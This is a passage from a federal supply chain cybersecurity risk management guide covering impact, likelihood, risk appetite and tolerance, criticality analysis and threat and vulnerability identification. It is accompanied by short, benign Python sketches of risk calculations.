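        "regulatory_fines": (100_000, 10_000_000),
        "reputational": (250_000, 2_500_000),
    },
}

def impact_range(event_type: str) -> tuple[int, int]:
    """Aggregate low/high impact across all impact types for an event type."""
    ranges = HARM_LIBRARY[event_type].values()
    return sum(lo for lo, _ in ranges), sum(hi for _, hi in ranges)

print("disruption impact range:", impact_range("disruption"))
```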
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
For C-SCRM, enterprises should refine and update their consequences and impact assumptions
to reflect the role that the availability, confidentiality, and integrity of supplier-provided products
or services have on the enterprise’s operations, assets, and individuals. For example, depending
on its criticality, the loss of a key supplier-provided input or service may reduce the enterprise’s
operational capacity or completely inhibit its operations. In this publication, impact or harm is in
relation to the enterprise’s primary objectives and arises from products or services traversing the
supply chain or the supply chain itself.
C-SCRM consequences and impact will manifest differently across all three levels in the risk
management hierarchy. Impact determinations require a combined top-down and bottom-up
approach. Table G-4 provides examples of how consequences and impact may be characterized
at different levels of the enterprise.
Table G-4: Supply Chain Cybersecurity Consequence and Impact Considerations

Level 1
Impact Considerations:
• General enterprise-level impact assumptions
• Supplier criticality (e.g., holistic supplier relationships)
Methods:
• Examine the magnitude of exposure to individual entities within the supply chain.
• Refine Level 2 analysis to determine aggregate Level 1 impacts on the enterprise's primary
function resulting from cybersecurity events to and through the supply chain.

Level 2
Impact Considerations:
• Process role in the enterprise's primary function
• Supplier criticality to mission/process (inputs and services)
Methods (for each type of cybersecurity event):
• Refine Level 3 analysis to determine aggregate mission and business process impacts due to
operational-level impacts from cybersecurity events to and through the supply chain.
• Examine the supplier network to identify business/mission-level impacts due to events that
affect individual supplier entities.

Level 3
Impact Considerations:
• Criticality of upstream and downstream Level 2 processes
• System criticality
• Supplier criticality to system operations (system components and services)
Methods:
• Examine the system's aggregated criticality to Level 1 and Level 2 primary processes.
• Examine the criticality of supplied system components or services to the system's overall
function.
• Examine the supplier network to identify individual entities that may disrupt the availability
of critical system inputs or services.
Enterprises should look to several sources for information that helps contextualize consequences
and impact. Historical data is preferable and can be gathered by reviewing records from the
agency, similar peer enterprises, supplier organizations, or applicable industry surveys.
Where gaps in historical data exist, enterprises should consider the use of expert elicitation
protocols (e.g., calibrated estimation training), which make use of the tacit knowledge of
appropriate individuals across the enterprise. By interviewing well-positioned experts (e.g.,
technology or mission and business owners of assets), enterprises can tailor impact assumptions
to reflect the enterprise’s unique conditions and dependencies. [NISTIR 8286] offers a more in-
depth discussion of how different quantitative and qualitative methodologies can be used to
analyze risk.
The following are examples of cybersecurity supply chain consequences and impacts:
• An earthquake in Malaysia reduces the amount of commodity dynamic random-access
memory (DRAM) to 60 % of the world’s supply, creating a shortage for hardware
maintenance and new design.
• The accidental procurement of a counterfeit part results in premature component failure,
thereby impacting the enterprise’s mission performance.
• Disruption at a key cloud service provider results in operational downtime losses of between
$1.5 million and $15 million.
Likelihood
In an information security risk analysis, likelihood is a weighted factor based on a subjective
analysis of the probability that a given threat is capable of exploiting a given vulnerability
[CNSSI 4009]. General likelihood assumptions should be inherited from the enterprise’s
enterprise risk management process and refined to account for C-SCRM-specific implications.
However, the general assumptions may need to be developed if they do not yet exist. The
likelihood analysis in the Frame step sets the enterprise’s long-term assumptions about the
relative likelihood of different adverse cybersecurity events. Likelihood is subject to extreme
short-term variations based on point-in-time conditions (i.e., internal and external) and must be
updated and refined as part of the Assess step.
In adversarial cases, a likelihood determination may be made using intelligence trend data,
historical data, and expert intuition on 1) adversary intent, 2) adversary capability, and 3)
adversary targeting. In non-adversarial cases (e.g., structural, environmental, accidental),
likelihood determinations will draw on expert intuition and historical data. When available,
historical data may help further reduce uncertainty about which cybersecurity risks throughout
the supply chain are probable to occur. Organizations may find historical data by looking to
internal sources such as past incident trackers or external sources such as ISACs in order to
approximate the likelihood of experiencing different cyber events. Likelihood analysis can
leverage many of the same expert elicitation protocols as consequences and impact. Similar to
consequences and impact, likelihood determinations may rely on qualitative or quantitative
forms and draw on similar techniques. To ensure that likelihood is appropriately contextualized
for decision makers, enterprises should make time-bound likelihood estimates for cybersecurity
events that affect the supply chain (e.g., likelihood within a given year).
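As a minimal sketch, a time-bound likelihood estimate can be derived from historical incident
counts, assuming incident arrivals approximate a Poisson process. The counts below are
hypothetical:

```python
import math

# Illustrative sketch: approximate the annual likelihood of at least one
# supply chain cybersecurity incident from historical counts, assuming a
# Poisson arrival process. The counts below are hypothetical.

incidents_per_year = [2, 0, 1, 3, 1]   # e.g., drawn from a past-incident tracker
rate = sum(incidents_per_year) / len(incidents_per_year)   # mean incidents/year

# P(at least one incident in a given year) = 1 - e^(-rate)
annual_likelihood = 1 - math.exp(-rate)
print(f"Estimated annual likelihood: {annual_likelihood:.0%}")
```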
Likelihood analysis will manifest differently across the three levels. Table G-5 captures some of
the considerations and methods specific to each level.
Table G-5: Supply Chain Cybersecurity Likelihood Considerations

Level 1
Likelihood Considerations:
• General threat and likelihood assumptions for the enterprise
• Level 2 and Level 3 likelihood findings
• Overall engagement models with suppliers that alter opportunities for contact with threat
sources
Methods:
• Analyze critical national infrastructure implications that may increase the enterprise's target
value.
• Refine analyses from Level 2 and Level 3 to determine aggregate exposure to threat source
contact.

Level 2
Likelihood Considerations:
• Mission/process-level threat and likelihood assumptions
• Mission/process-level engagement model with suppliers (e.g., criticality of assets interacted
with)
• Level 3 findings for relevant systems
Methods:
• Evaluate mission and business process level conditions that present opportunities for threat
sources to come into contact with processes or assets via the supply chain.
• Evaluate the aggregate supply chain threat conditions facing key systems relied on by mission
and business processes.

Level 3
Likelihood Considerations:
• Enterprise system threat and likelihood assumptions
• Supplier and system target value
• Location and operating conditions
• Supplier and system security policies, processes, and controls
• Nature and degree of supplier contact with the system (inputs, services)
Methods:
• Analyze the nature of system inputs that come through the supply chain into the SDLC and
that alter the likelihood of encountering threat sources.
• Evaluate the system roles in Level 1 and Level 2 processes that alter the target value for
potential adversaries.
• Analyze supply chain characteristics (e.g., location of supplier) that may increase the
likelihood that a system is affected by a threat source.
Agencies should identify which approaches they will use to determine the likelihood of a supply
chain cybersecurity compromise, consistent with the overall approach used by the agency’s risk
management process. Agencies should ensure that appropriate procedures are in place to
thoroughly document any risk analysis assumptions that lead to the tabulation of the final risk
exposure, especially in cases where high or critical impact risks are involved. Visibility into
assumptions may be critical in enabling decision makers to take action.
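A minimal sketch of such a tabulation, with assumptions documented alongside each risk, is
shown below. All identifiers, values, and assumption text are hypothetical:

```python
# Illustrative sketch: tabulate risk exposure as likelihood x impact and keep
# the documented assumptions alongside the result for decision-maker visibility.
# All identifiers, values, and assumption text are hypothetical.

risks = [
    {"id": "R-1", "likelihood": 0.15, "impact_usd": 4_000_000,
     "assumptions": "Single-source supplier; no alternate qualified vendor."},
    {"id": "R-2", "likelihood": 0.05, "impact_usd": 12_000_000,
     "assumptions": "Counterfeit component reaches the production line."},
]

for r in risks:
    r["exposure_usd"] = r["likelihood"] * r["impact_usd"]

for r in sorted(risks, key=lambda r: r["exposure_usd"], reverse=True):
    print(f'{r["id"]}: ${r["exposure_usd"]:,.0f} ({r["assumptions"]})')
```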
RISK MANAGEMENT PROCESS CONSTRAINTS
TASK 1-2: Identify constraints64 on the conduct of risk assessment, risk response, and risk
monitoring activities within the enterprise.
Supplemental Guidance
Identify the following two types of constraints to ensure that the cybersecurity supply chain is
integrated into the agency risk management process:
1. Agency constraints
2. Supply chain-specific constraints
Agency constraints serve as an overall input to framing the cybersecurity supply chain policy at
Level 1, mission requirements at Level 2, and system-specific requirements at Level 3. Table G-
6 lists the specific agency and cybersecurity supply chain constraints. Supply chain constraints,
such as the C-SCRM policy and C-SCRM requirements, may need to be developed if they do not
exist.
Table G-6: Supply Chain Constraints

Level 1
Agency Constraints:
• Enterprise policies, strategies, and governance
• Applicable laws and regulations
• Mission and business processes
• Enterprise processes (security, quality, etc.)
• Resource limitations
Supply Chain Constraints:
• Enterprise C-SCRM policy based on the existing agency policies, strategies, and governance;
applicable laws and regulations; mission and business processes; and enterprise processes
• Acquisition regulations and policy
• Available, mandated, or restricted sources of supply or products

Level 2
Agency Constraints:
• Mission and business processes
• Criticality of processes
• Enterprise architecture
• Mission-level security policies
Supply Chain Constraints:
• C-SCRM mission and business requirements that are incorporated into mission and business
processes and enterprise architecture
• Supplier service contracts, product warranties, and liability agreements

Level 3
Agency Constraints:
• Functional requirements
• Security requirements
Supply Chain Constraints:
• Product and operational-level C-SCRM capabilities
• Supplier-provided system component warranties and service agreements

64 Refer to [NIST SP 800-39], Section 3.1, Task 1-2 for a description of constraints in the risk management context.
One of the primary methods by which constraints are articulated is via a policy statement or
directive. An enterprise’s C-SCRM policy is a critical vehicle for directing C-SCRM activities.
Driven by applicable laws and regulations, this policy should support enterprise policies,
including acquisition and procurement, information security, quality, and supply chain and
logistics. The C-SCRM policy should address the goals, objectives, and requirements articulated
by the overall agency strategic plan, mid-level mission and business process strategy, and
internal or external customers. The C-SCRM policy should also define the integration points for
C-SCRM with the agency’s Risk Management Process and SDLC.
C-SCRM policy should define the C-SCRM-related roles and responsibilities of the agency C-
SCRM team and any dependencies or interactions among those roles. C-SCRM-related roles will
articulate responsibilities for collecting supply chain cybersecurity threat intelligence, conducting
risk assessments, identifying and implementing risk-based mitigations, and performing
monitoring processes. Identifying and validating roles will help to specify the amount of effort
required to implement the C-SCRM plan. Examples of C-SCRM-related roles include:
• A C-SCRM PMO that provides overarching guidance on cybersecurity risks throughout the
supply chain, informing engineering decisions that specify and select cyber products as the
system design is finalized
• Procurement officer and maintenance engineer responsible for identifying and replacing
defective hardware
• Delivery enterprise and acceptance engineers who verify that the system component is
acceptable to receive into the acquiring enterprise
• System integrator responsible for system maintenance and upgrades, whose staff resides
in the acquirer facility and uses system integrator development infrastructure and the
acquirer operational infrastructure
• System security engineer/systems engineer responsible for ensuring that information
system security concerns are properly identified and addressed throughout the SDLC
• The end user of cyber systems, components, and services
C-SCRM requirements should be guided by C-SCRM policies, mission and business processes,
their criticality at Level 2, and known functional and security requirements at Level 3.
RISK APPETITE AND TOLERANCE
TASK 1-3: Identify the levels of risk appetite and tolerance across the enterprise.
Supplemental Guidance
On a broad level, risk appetite represents the types and amount of risk that an enterprise is
willing to accept in pursuit of value [NISTIR 8286]. Conversely, risk tolerance is the enterprise
or stakeholder’s readiness to bear the remaining risk after a risk response in order to achieve their
objectives with the consideration that such tolerance can be influenced by legal or regulatory
requirements [NISTIR 8286]. This definition is adapted from COSO, which states that risk
tolerance is the acceptable level of variation relative to achievement of a specific objective.
Often, risk tolerance is best measured in the same units as those used to measure the related
objective [COSO 2011]. When establishing a risk management framework, it is recommended
that enterprises establish risk appetite and risk tolerance statements that set risk thresholds. Then,
where applicable, C-SCRM should align with risk appetite and tolerance statements from the
enterprise risk management process. Once established, risk appetite and risk tolerance should be
monitored and modified over time. For C-SCRM, these statements should be contextualized to
inform decisions in the C-SCRM domain. Those responsible for C-SCRM across the enterprise
should work with and support enterprise leaders on the development of C-SCRM-related risk
appetite and risk tolerance statements. This should be done in accordance with criteria provided
from the enterprise risk strategy (e.g., based on ERM risk categories).
Risk appetite and tolerance statements strongly influence the decisions made about C-SCRM
across the three levels. Some enterprises may define risk appetite and risk tolerance as part of
their broader enterprise risk management activities. In enterprises without a clearly defined risk
appetite, Level 1 stakeholders should collaborate with enterprise leadership to define and
articulate the enterprise’s appetite for risk within the scope of the C-SCRM program’s mandates.
Enterprises with multiple organizations may choose to tailor risk appetite statements for specific
organizations and mission and business processes. In general, risk appetite at Level 1 may be set
to empower the enterprise to meet its value objectives (e.g., high appetite for supplier risk in
support of reducing operating costs by 5 %). At Level 2 and Level 3, an organization’s risk
appetite statements are operationalized through risk tolerance statements. For example, an
organization with a low appetite for supply chain cybersecurity risk may issue risk tolerance
statements that necessitate restraint and control by Level 2 and Level 3 decision makers as they
pursue strategic value (e.g., tolerance statement crafted based on strict production targets for an
organization that supports a national security-related mission).
Fig. G-4: Risk Appetite and Risk Tolerance
Together, risk appetite and risk tolerance provide expectations and acceptable boundaries for
performance against the organization’s strategic objectives. Figure G-4 illustrates how risk
appetite and risk tolerance may be used as guidelines for the organization’s operational decision
makers. Risk tolerance may be set with boundaries that exceed risk appetite to provide a degree
of flexibility for achieving the organization’s strategic objectives. However, operational decision
makers should strive to remain within risk appetite during normal conditions and exceed the
boundaries only as absolutely necessary (e.g., to capitalize on significant opportunities, avoid
highly adverse conditions). Observed periods of performance in the Review Zone, which lies
outside of risk appetite boundaries, should trigger a review of operational decisions and defined
risk appetite and tolerance statements. The review is critical to ensuring that the organization’s
appetite for risk remains appropriate and applicable given the organization’s internal and external
operating conditions. For example, an organization operating during a global pandemic may find
it necessary to take on additional levels of cyber risk exposure via alternative suppliers in order
to circumvent supply shortages. Figure G-5 below provides an illustrative risk appetite and risk
tolerance review process.
[Figure G-4 plots performance over time within the risk universe, bounded by best and worst
outcomes, with the risk appetite band nested inside a wider risk tolerance band.]
Fig. G-5: Risk Appetite and Risk Tolerance Review Process
In some cases, organizational leaders may find it necessary to rebalance guidance to avoid excess
risk aversion behavior (i.e., performance below appetite) or excess risk-seeking behavior (i.e.,
performance above appetite) by decision makers.
Table G-7 shows additional examples of how risk appetite and risk tolerance statements work
together to frame risk within an enterprise.
Table G-7: Supply Chain Risk Appetite and Risk Tolerance

Risk Appetite: Low appetite for risk with respect to market objectives that require 24/7 uptime
Risk Tolerance: Low tolerance (i.e., no more than 5 % probability) for service provider
downtime that causes system disruptions to exceed contractual service level agreements (SLAs)
by more than 10 %

Risk Appetite: Low appetite for risk with respect to production objectives that require > 99 %
on-time delivery of products to customers with national security missions
Risk Tolerance: Near-zero tolerance (i.e., no more than 5 % probability) for supply chain
disruptions that cause production levels to fall below 99 % of the target threshold for military
products

Risk Appetite: Low appetite for risk related to national security objectives that require 99 %
effectiveness of security processes
Risk Tolerance: Low tolerance (i.e., no more than 1 % of contractor access authorizations) for
inappropriate contractor access that exceeds authorized windows by more than 10 % in systems
with classified information

Risk Appetite: Moderate appetite for risk related to operational objectives of non-mission-
critical areas that require 99.5 % availability
Risk Tolerance: Moderate tolerance (i.e., no more than 15 % probability) for system component
failures causing non-critical system disruptions that exceed recovery time objectives by more
than 10 %
To ensure that leadership has the appropriate information when making risk-based decisions,
enterprises should establish measures (e.g., key performance indicators [KPIs], key risk
indicators [KRIs]) to measure performance against defined risk appetite and risk tolerance
statements. The identification of corresponding data sources for measurement should play a key
role in the enterprise’s defined processes for setting and refining risk appetite and tolerance
statements. Risk appetite and risk tolerance should be treated as dynamic by the enterprise. This
requires periodic updates and revisions based on internal (e.g., new leadership, strategy) and
external (e.g., market, environmental) changes that impact the enterprise.
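As a minimal sketch, a KRI can be measured against a defined tolerance threshold and flagged
for review when it falls outside of it. The threshold and observations below are hypothetical:

```python
# Illustrative sketch: compare an observed key risk indicator (KRI) against a
# risk tolerance threshold and flag periods that require review.
# The tolerance value and the quarterly observations are hypothetical.

TOLERANCE_MAX_SLA_BREACH_PCT = 10.0   # e.g., "...exceed SLAs by more than 10 %"

observed_sla_breach_pct = {"Q1": 4.2, "Q2": 11.7, "Q3": 9.9}

for period, value in observed_sla_breach_pct.items():
    status = "REVIEW" if value > TOLERANCE_MAX_SLA_BREACH_PCT else "within tolerance"
    print(f"{period}: {value:.1f} % -> {status}")
```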
Enterprises should consider supply chain cybersecurity threats, vulnerabilities, constraints, and
criticality when establishing, operationalizing, and maintaining the overall level of risk appetite
and risk tolerance.65
PRIORITIES AND TRADE-OFFS
TASK 1-4: Identify priorities and trade-offs considered by the enterprise in managing risk.
Supplemental Guidance
Priorities and trade-offs are closely linked to the enterprise’s risk appetite and tolerance
statements, which communicate the amount of risk that is acceptable and tolerable to the
enterprise in pursuit of its objectives. Priorities will take the form of long-term strategic
objectives or near-term strategic imperatives that alter the risk decision calculus. From priorities
and trade-offs, C-SCRM then receives critical strategic context required for Response step
activities, such as Evaluation of Alternatives and Risk Response Decision. As a part of
identifying priorities and trade-offs, enterprises should consider risk appetite, risk tolerance,
supply chain cybersecurity threats, vulnerabilities, constraints, and criticality.
Priority and trade-off considerations will manifest differently across the three levels. At Level 1,
priority and trade-off considerations may favor existing supplier relationships in established
regions at the expense of new supplier cost advantages due to a desire to maintain confidence
and stability. At Level 2, priority and trade-off considerations may favor centralized C-SCRM
governance models that cover product teams in order to achieve greater standardization of
security practices. At Level 3, priorities and trade-offs may favor system components/sub-
components that are produced in certain geographies in an effort to avoid environmental or
geopolitical risks to the supply chain.
65 The governance structures of federal departments and agencies vary widely (see [NIST SP 800-100, Section 2.2.2]).
Regardless of the governance structure, individual agency risk decisions should apply to the agency and any subordinate
organizations but not vice versa.
Outputs and Post Conditions
Within the scope of [NIST SP 800-39], the output of the risk framing step is the risk
management strategy that identifies how enterprises intend to assess, respond to, and monitor
risk over time. This strategy should clearly include any identified C-SCRM considerations and
should result in the establishment of C-SCRM-specific processes throughout the agency. These
processes should be documented in one of three ways:
1. Integrated into existing agency documentation,
2. Described in a separate set of documents that address C-SCRM, or
3. Captured in a mix of separate and integrated documents based on agency needs and
operations.
Regardless of how the outputs are documented, the following information should be provided as
an output of the risk framing step:
• C-SCRM policy;
• Criticality, including prioritized mission and business processes and [FIPS 199] impact;
• Cybersecurity supply chain risk assessment methodology and guidance;
• Cybersecurity supply chain risk response guidance;
• Cybersecurity supply chain risk monitoring guidance;
• C-SCRM mission and business requirements;
• Revised mission and business processes and enterprise architecture with C-SCRM
considerations integrated;
• Operational level C-SCRM requirements; and
• Acquisition security guidance/requirements.
Outputs from the risk framing step enable prerequisites to effectively manage cybersecurity risks
throughout the supply chain and serve as inputs to the risk assessment, risk response, and risk
monitoring steps.
Assess
Inputs and Preconditions
Assess is the step where assumptions, established methodologies, and collected data are used to
conduct a risk assessment. Numerous inputs (including criticality, risk appetite and tolerance,
threats, vulnerability analysis, stakeholder knowledge, policy, constraints, and requirements) are
combined and analyzed to gauge the likelihood and impact of a supply chain cybersecurity
compromise. Assess step activities are used to update the enterprise’s long-term risk-framing
assumptions to account for near-term variations and changes.
A cybersecurity supply chain risk assessment should be integrated into the overall enterprise risk
assessment process. C-SCRM risk assessment results should be used and aggregated as
appropriate to communicate potential or actual cybersecurity risks throughout the supply chain
relevant to each risk management framework level. Figure G-6 depicts the Assess step with its
inputs and outputs along the three levels.
Fig. G-6: C-SCRM in the Assess Step66

Enterprise level –
Inputs: enterprise and C-SCRM risk assessment methodologies; breadth and depth requirements
for risk analysis; guidance for aggregating risk to the enterprise level; output of Level 1
C-SCRM risk framing; Level 2 and 3 C-SCRM assessments; C-SCRM risk monitoring outputs;
supplier inventory.
Assess activities: update the longer-term C-SCRM frame with up-to-date context and
assumptions; assess cybersecurity risks in the supply chain to enterprise-level operations, assets,
and individuals; refine, enhance, and aggregate Level 2 and 3 assessments.
Outputs: aggregated enterprise-level C-SCRM risk profile; enterprise-level supply chain
cybersecurity risk assessment results.

Mission/business process level –
Inputs: mission/business-specific C-SCRM risk assessment methodologies; output of Level 2
C-SCRM risk framing; guidance for aggregating risk to the specific mission/business; Level 2
and 3 C-SCRM assessments; C-SCRM risk monitoring outputs; supplier inventory; asset
inventory.
Assess activities: update the longer-term C-SCRM frame with up-to-date context and
assumptions; assess cross-cutting supply chain cybersecurity threats and vulnerabilities; assess
cybersecurity risks in the supply chain to mission/business-level operations, assets, and
individuals; refine, enhance, and aggregate applicable Level 3 assessments.
Outputs: assessment results showing cross-cutting cybersecurity risks in the supply chain;
aggregated mission/business-specific C-SCRM risk profile; mission/business-specific supply
chain cybersecurity risk assessment results.

Operational level –
Inputs: operational-level C-SCRM requirements; operational business impact analyses for
supported missions/businesses; system component inventory; supplier inventory; operational
C-SCRM risk monitoring outputs.
Assess activities: assess cybersecurity risks in the supply chain for systems, system components,
system services, and operations.
Outputs: operational-level risk assessment results.

66 More detailed information on the Risk Management Process can be found in Appendix C.

Criticality, vulnerability, and threat analyses are essential to the supply chain risk assessment
process. The order of activities begins with updating the criticality analysis to ensure that the
assessment is scoped to minimally include relevant critical mission and business processes and to
understand the relevance and impact of supply chain elements on these mission and business
processes. As depicted in Figure G-6, vulnerability and threat analyses can then be performed in
any order but should be performed iteratively to ensure that all applicable threats and
vulnerabilities have been identified to understand which vulnerabilities may be more susceptible
to exploitation by certain threats and – if and as applicable – to associate identified
vulnerabilities and threats to one or more mission and business processes or supply chain
elements. Once viable threats and potential or actual vulnerabilities are assessed, this information
will be used to evaluate the likelihood of exploitability – a key step to understanding impact.
This is a synthesis point for criticality analysis, vulnerability analysis, and threat analysis and
helps to further clarify and contextualize impact to support an informed and justifiable risk
decision.
Activities
CRITICALITY ANALYSIS
TASK 2-0: Update the criticality analysis of mission and business processes, systems, and
system components to narrow the scope (and resource needs) for C-SCRM activities to those
most important to mission success.
Supplemental Guidance
Criticality analysis should include the supply chain for the enterprise and applicable suppliers,
developers, system integrators, external system service providers, and other ICT/OT-related
service providers, as well as relevant non-system services and products. Criticality analysis
assesses the direct impact that each entity has on mission priorities. The supply chain includes
the SDLC for applicable systems, services, and components because the SDLC defines whether
security considerations are built into the systems/components or added after the
systems/components have been created.
Enterprises should update and tailor the criticality established during the Frame step of the risk
management process, including the [FIPS 199] system categorization. For low-impact systems,
enterprises should minimally assess criticality regarding interdependencies that those systems
may have with moderate- or high-impact systems. If systems are used extensively throughout
the enterprise, enterprises should determine the holistic impact of component failure or
compromise in the low-impact system.
In addition to updating and tailoring criticality, performing criticality analysis in the Assess step
may include the following:
• Refining the dependency analysis and assessment to understand which components may
require hardening given the system or network architecture;
• Obtaining and reviewing existing information that the agency has about critical
systems/components, such as locations where they are manufactured or developed,
physical and logical delivery paths, information flows and financial transactions
associated with these components, and any other available information that can provide
insights into the supply chain of these components;67 and
• Updating information about the supply chain, historical data, and the SDLC to identify
changes in critical supply chain paths and conditions.
The outcome of the updated criticality analysis is a narrowed, prioritized list of the enterprise’s
critical processes, systems, and system components, as well as a refined understanding of
corresponding dependencies within the supply chain. Enterprises can use the criticality process
in Task 1-1 to update their criticality analysis.
Because more information will be available in the Assess step, enterprises can narrow the scope
and increase the granularity of a criticality analysis. When identifying critical processes and
associated systems/components and assigning them criticality levels, consider the following:
• Functional breakdown is an effective method for identifying processes and associated
critical components and supporting defensive functions.
• Disaster recovery and continuity of operations plans often define critical systems and
system components, which can be helpful in assigning criticality.
• Dependency analysis is used to identify the processes on which other critical processes
depend (e.g., defensive functions, such as digital signatures used in software patch
acceptance); a sketch follows this list.
• The identification of all access points helps identify and limit unmediated access to
critical functions and components (e.g., least-privilege implementation).
• Value chain analysis enables the understanding of inputs, process actors, outputs, and
customers of services and products.
• Malicious alteration or other types of supply chain compromise can happen throughout
the SDLC.
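For illustration, the dependency analysis item above can be sketched as a transitive traversal of
a dependency graph; the process and function names in the graph below are hypothetical:

```python
# Illustrative sketch: transitively enumerate the dependencies of a critical
# process so that defensive functions (e.g., patch-signature verification)
# are included in the criticality analysis. The graph below is hypothetical.

DEPENDS_ON = {
    "claims_processing": ["claims_system"],
    "claims_system": ["patch_acceptance", "identity_service"],
    "patch_acceptance": ["code_signing_keys"],
    "identity_service": [],
    "code_signing_keys": [],
}

def transitive_dependencies(node: str) -> set[str]:
    """Depth-first traversal collecting everything the node depends on."""
    seen: set[str] = set()
    stack = list(DEPENDS_ON.get(node, []))
    while stack:
        dep = stack.pop()
        if dep not in seen:
            seen.add(dep)
            stack.extend(DEPENDS_ON.get(dep, []))
    return seen

print(sorted(transitive_dependencies("claims_processing")))
```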
The resulting list of critical processes and supply chain dependencies is used to guide and inform
vulnerability analysis and threat analysis in determining the initial C-SCRM risk, as depicted in
Figure D-4. Supply chain countermeasures and mitigations can then be selected and
implemented to reduce risk to acceptable levels.
Criticality analysis is performed iteratively and may be performed at any point in the SDLC and
concurrently by level. The first iteration is likely to identify critical processes and systems or
components that have a direct impact on mission and business processes. Successive iterations
will include information from the criticality analysis, threat analysis, vulnerability analysis, and
mitigation strategies defined at each of the other levels. Each iteration will refine the criticality
analysis outcomes and result in the addition of defensive functions. Several iterations will likely
be required to establish and maintain criticality analysis results. Enterprises should document or
record the results of their criticality analysis and review and update this assessment on an annual
basis, at minimum.
67 This information may be available from a supply chain map for the agency or individual IT projects or systems. Supply chain
maps are descriptions or depictions of supply chains that include the physical and logical flow of goods, information, processes,
and money upstream and downstream through a supply chain. They may include supply chain entities, locations, delivery paths,
or transactions.
THREAT AND VULNERABILITY IDENTIFICATION
TASK 2-1: Identify threats to and vulnerabilities in enterprise information systems and the
environments in which the systems operate.
Supplemental Guidance
In addition to threat and vulnerability identification, as described in [NIST SP 800-39] and
[NIST SP 800-30, Rev. 1], enterprises should conduct supply chain cybersecurity threat analysis
and vulnerability analysis.
Threat Analysis
For C-SCRM, a threat analysis provides specific and timely characterizations of threat events
(see Appendix C), potential threat actors (e.g., nation-state), and threat vectors (e.g., third-party
supplier) to inform management, acquisition, engineering, and operational activities within an
enterprise.68 A variety of information can be used to assess potential threats, including open
source, intelligence, and counterintelligence. Enterprises should include, update, and refine the
threat sources and assumptions defined during the Frame step. The results of the threat analysis
will ultimately support acquisition decisions, alternative build decisions, and the development
and selection of appropriate mitigations to be applied in the Respond step. The focus of supply
chain threat analysis should be based on the results of the criticality analysis.
Enterprises should use the information available from existing incident management activities to
determine whether they have experienced a supply chain cybersecurity compromise and to
further investigate such compromises. Agencies should define criteria for what constitutes a
supply chain cybersecurity compromise to ensure that such compromises can be identified as a
part of post-incident activities, including forensics investigations. Additionally – at agency-
defined intervals – agencies should review other sources of incident information within the
enterprise to determine whether a supply chain compromise has occurred.
A supply chain cybersecurity threat analysis should capture at least the following data (a sketch
of a corresponding record structure follows this list):
• An observation of cybersecurity supply chain-related attacks while they are occurring;
• Incident data collected post-cybersecurity supply chain-related compromise;
• An observation of tactics, techniques, and procedures used in specific attacks, whether
observed or collected using audit mechanisms; and
• Natural and human-made disasters before, during, and after occurrence.
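The data elements above lend themselves to structured capture. The following is a minimal illustrative sketch in Python (the record type, field names, and sample values are assumptions for illustration, not prescribed by this publication) of a threat-event record that covers the four data elements:

```python
from dataclasses import dataclass, field
from datetime import date
from typing import List, Optional

@dataclass
class SupplyChainThreatEvent:
    """Illustrative threat-event record; all field names are assumed."""
    observed_on: date                  # when the event or attack was observed
    threat_actor: str                  # potential threat actor, e.g., "nation-state"
    threat_vector: str                 # e.g., "third-party supplier"
    ttps: List[str] = field(default_factory=list)           # observed or audited TTPs
    incident_data: List[str] = field(default_factory=list)  # post-compromise artifacts
    disaster_context: Optional[str] = None  # natural or human-made disaster, if any

# Example record built from audit-mechanism observations (values are hypothetical):
event = SupplyChainThreatEvent(
    observed_on=date(2021, 12, 10),
    threat_actor="nation-state",
    threat_vector="third-party supplier",
    ttps=["malicious update", "stolen code-signing certificate"],
)
print(event.threat_vector)
```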
68 Note that the threat characterization of suppliers, developers, system integrators, external system service providers, and other
ICT/OT-related service providers may be benign.
Vulnerability Analysis
For C-SCRM, a vulnerability is a weakness in an information system, system security
procedures, internal controls, or implementation that could be exploited or triggered by a threat
source [NIST SP 800-53, Rev. 5].
A vulnerability analysis is an iterative process that informs risk assessments and countermeasure
selection. The vulnerability analysis works alongside the threat analysis to help inform the
impact analysis and to help scope and prioritize the vulnerabilities to be mitigated.
Vulnerability analysis in the Assess step should use the approaches defined during the Frame
step to update and refine assumptions about supply chain cybersecurity vulnerabilities.
Vulnerability analysis should begin by identifying vulnerabilities that are applicable to critical
mission and business processes and the systems or system components identified by the
criticality analysis. An investigation of vulnerabilities may indicate the need to raise or at least
reconsider the criticality levels of processes and components identified in earlier criticality
analyses. Later iterations of the vulnerability analysis may also identify additional threats or
opportunities for threats that were not considered in earlier threat assessments.
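As a concrete illustration of scoping the analysis by criticality, the short Python sketch below (all component names, criticality ratings, and severity scores are hypothetical assumptions) filters identified vulnerabilities down to those affecting critical components and orders them for mitigation:

```python
# Hypothetical outputs of the criticality analysis and vulnerability identification.
criticality = {"auth-service": "high", "report-gen": "low", "build-server": "high"}
vulnerabilities = [
    {"id": "V-1", "component": "auth-service", "severity": 9.1},
    {"id": "V-2", "component": "report-gen", "severity": 7.4},
    {"id": "V-3", "component": "build-server", "severity": 5.5},
]

# Begin with vulnerabilities applicable to critical components, ordered by
# severity so the highest-impact items are considered for mitigation first.
critical_vulns = sorted(
    (v for v in vulnerabilities if criticality.get(v["component"]) == "high"),
    key=lambda v: v["severity"],
    reverse=True,
)
for v in critical_vulns:
    print(v["id"], v["component"], v["severity"])  # V-1, then V-3; V-2 is out of scope
```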
Table G-8 provides examples of applicable supply chain cybersecurity vulnerabilities that can be
observed within the three levels.
Table G-8: Examples of Supply Chain Cybersecurity Vulnerabilities Mapped to the Enterprise Levels

Level 1 – Enterprise

Vulnerability Considerations:
1) Deficiencies or weaknesses in enterprise governance structures or processes, such as the lack of a C-SCRM Plan
2) Weaknesses in the supply chain itself (e.g., vulnerable entities, over-reliance on certain entities)

Methods:
1) Provide guidance on how to consider dependencies on external enterprises as vulnerabilities.
2) Seek out alternative sources of new technology, including building in-house and leveraging trustworthy shared services and common solutions.

Level 2 – Mission and Business

Vulnerability Considerations:
1) No operational process in place for detecting counterfeits
2) No budget allocated for the implementation of a technical screening for acceptance testing of supplied system components entering the SDLC as replacement parts
3) Susceptibility to adverse issues from innovative technology supply sources (e.g., technology owned or managed by third parties is buggy)

Methods:
1) Develop a program for detecting tainted or counterfeit products, and allocate an appropriate budget for resources and training.
2) Allocate a budget for acceptance testing (technical screening of components entering the SDLC).

Level 3 – Operation

Vulnerability Considerations:
1) Discrepancy in system functions not meeting requirements, resulting in substantial impact to performance

Methods:
1) Initiate engineering changes to address the functional discrepancy, and test corrections for performance impacts. Malicious alteration can happen to an agency system throughout the system life cycle.
2) Review vulnerabilities disclosed in the vulnerability disclosure report (VDR) published by software vendors.
